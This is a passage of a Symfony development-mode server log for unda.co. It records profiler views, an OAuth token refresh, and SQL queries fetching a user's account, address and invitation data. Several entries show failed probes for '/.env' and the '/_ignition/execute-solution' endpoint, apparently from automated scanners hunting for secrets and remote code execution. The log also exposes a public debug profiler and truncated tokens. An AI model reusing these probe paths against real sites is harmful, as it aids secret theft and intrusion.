  4224. [2025-12-18 18:52:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4225. [2025-12-18 18:53:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"becd18","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/becd18","method":"GET"} []
  4226. [2025-12-18 18:53:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  4227. [2025-12-18 18:57:20] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"HEAD"} []
  4228. [2025-12-18 18:57:20] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  4229. [2025-12-18 18:57:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4230. [2025-12-18 18:57:22] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  4231. [2025-12-18 18:57:23] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
  4232. [2025-12-18 18:57:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4233. [2025-12-18 18:57:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public/_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public/_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4234. [2025-12-18 18:59:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02584c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/02584c?panel=twig","method":"GET"} []
  4235. [2025-12-18 18:59:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4236. [2025-12-18 19:07:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02584c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/02584c?panel=time","method":"GET"} []
  4237. [2025-12-18 19:07:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4238. [2025-12-18 19:12:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6442c4","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/6442c4","method":"GET"} []
  4239. [2025-12-18 19:12:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  4240. [2025-12-18 19:14:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"db61c1","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/db61c1","method":"GET"} []
  4241. [2025-12-18 19:14:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4242. [2025-12-18 19:15:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4243. [2025-12-18 19:16:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4244. [2025-12-18 19:17:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4245. [2025-12-18 19:17:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02584c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/02584c?panel=request","method":"GET"} []
  4246. [2025-12-18 19:17:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4247. [2025-12-18 19:28:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02584c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/02584c?panel=config","method":"GET"} []
  4248. [2025-12-18 19:28:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4249. [2025-12-18 19:28:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"309a78","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/309a78?panel=events","method":"GET"} []
  4250. [2025-12-18 19:28:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  4251. [2025-12-18 19:30:06] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"b1be4f","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/b1be4f/search/results?ip=189.172.56.183&limit=10","method":"GET"} []
  4252. [2025-12-18 19:30:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10","method":"GET"} []
  4253. [2025-12-18 19:30:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4a9f2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/4a9f2a?panel=cache","method":"GET"} []
  4254. [2025-12-18 19:30:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4255. [2025-12-18 19:33:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /users/sign_in"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /users/sign_in\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4256. [2025-12-18 19:36:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e183e3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e183e3","method":"GET"} []
  4257. [2025-12-18 19:36:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  4258. [2025-12-18 19:37:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"088b20","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/088b20?panel=twig","method":"GET"} []
  4259. [2025-12-18 19:37:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4260. [2025-12-18 19:37:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
  4261. [2025-12-18 19:38:08] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"f45022","_route":"_wdt"},"request_uri":"https://www.unda.co/_wdt/f45022","method":"GET"} []
  4262. [2025-12-18 19:45:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"088b20","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/088b20?panel=time","method":"GET"} []
  4263. [2025-12-18 19:45:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4264. [2025-12-18 19:54:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"088b20","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/088b20?panel=security","method":"GET"} []
  4265. [2025-12-18 19:54:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4266. [2025-12-18 19:55:57] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=address%2Cnotification_setting%2Cresidential","method":"GET"} []
  4267. [2025-12-18 19:55:57] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4268. [2025-12-18 19:55:57] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4269. [2025-12-18 19:55:57] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4270. [2025-12-18 19:55:57] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4271. [2025-12-18 19:55:57] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["ea268be9b03224f64d066e1f1e [...]"] []
  4272. [2025-12-18 19:55:57] security.INFO: Guard authentication failed. {"exception":"[object] (Hona\\AdminBundle\\Exception\\NotValidTokenFoundException(code: 0): Expired Token at /var/repositories/hona/src/Hona/AdminBundle/Security/AdminUserProvider.php:79)","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4273. [2025-12-18 19:55:57] security.DEBUG: The "Hona\ApiBundle\Security\ApiAuthenticator" authenticator set the response. Any later authenticator will not be called {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4274. [2025-12-18 19:55:58] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
  4275. [2025-12-18 19:55:58] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
  4276. [2025-12-18 19:55:58] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["2ddd8825467a868ac0ba2a908d [...]"] []
  4277. [2025-12-18 19:55:58] doctrine.DEBUG: "START TRANSACTION" [] []
  4278. [2025-12-18 19:55:58] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"d3e6ab7ec29c90a60851e5ab0e [...]","3":"2025-12-18 20:25:58","4":"","5":458,"6":"[]"} []
  4279. [2025-12-18 19:55:58] doctrine.DEBUG: "COMMIT" [] []
  4280. [2025-12-18 19:55:58] doctrine.DEBUG: "START TRANSACTION" [] []
  4281. [2025-12-18 19:55:58] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"daa5fab2d477a45d531b0f54eb [...]","3":"2026-02-16 19:55:58","4":"","5":458,"6":"[]"} []
  4282. [2025-12-18 19:55:58] doctrine.DEBUG: "COMMIT" [] []
  4283. [2025-12-18 19:55:58] doctrine.DEBUG: "START TRANSACTION" [] []
  4284. [2025-12-18 19:55:58] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"2ddd8825467a868ac0ba2a908d [...]"] []
  4285. [2025-12-18 19:55:58] doctrine.DEBUG: "COMMIT" [] []
  4286. [2025-12-18 19:55:58] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=address%2Cnotification_setting%2Cresidential","method":"GET"} []
  4287. [2025-12-18 19:55:58] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4288. [2025-12-18 19:55:58] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4289. [2025-12-18 19:55:58] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4290. [2025-12-18 19:55:58] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4291. [2025-12-18 19:55:58] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d3e6ab7ec29c90a60851e5ab0e [...]"] []
  4292. [2025-12-18 19:55:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
  4293. [2025-12-18 19:55:58] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4294. [2025-12-18 19:55:58] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4295. [2025-12-18 19:55:58] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4296. [2025-12-18 19:55:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["a1459bf9-4d7b-4d4c-ae6f-8a [...]"] []
  4297. [2025-12-18 19:55:58] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [458,1] []
  4298. [2025-12-18 19:55:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  4299. [2025-12-18 19:55:58] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [458,1] []
  4300. [2025-12-18 19:55:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
  4301. [2025-12-18 19:55:58] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [458,259] []
  4302. [2025-12-18 19:55:58] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  4303. [2025-12-18 19:55:59] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"ac5559db-94bf-49bb-b4bf-9d75cd7022a2","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/ac5559db-94bf-49bb-b4bf-9d75cd7022a2/invitation/20/0?order=desc","method":"GET"} []
  4304. [2025-12-18 19:55:59] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  4305. [2025-12-18 19:55:59] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4306. [2025-12-18 19:55:59] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4307. [2025-12-18 19:55:59] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4308. [2025-12-18 19:55:59] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["d3e6ab7ec29c90a60851e5ab0e [...]"] []
  4309. [2025-12-18 19:55:59] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
  4310. [2025-12-18 19:55:59] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4311. [2025-12-18 19:55:59] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4312. [2025-12-18 19:55:59] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  4313. [2025-12-18 19:55:59] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
  4314. [2025-12-18 19:55:59] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [458,259,1] []
  4315. [2025-12-18 19:55:59] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
  4316. [2025-12-18 19:55:59] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  4317. [2025-12-18 19:55:59] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [259,1] []
  4318. [2025-12-18 19:55:59] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [259,1] []
  4319. [2025-12-18 19:55:59] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
  4320. [2025-12-18 19:55:59] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [459] []
  4321. [2025-12-18 19:55:59] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
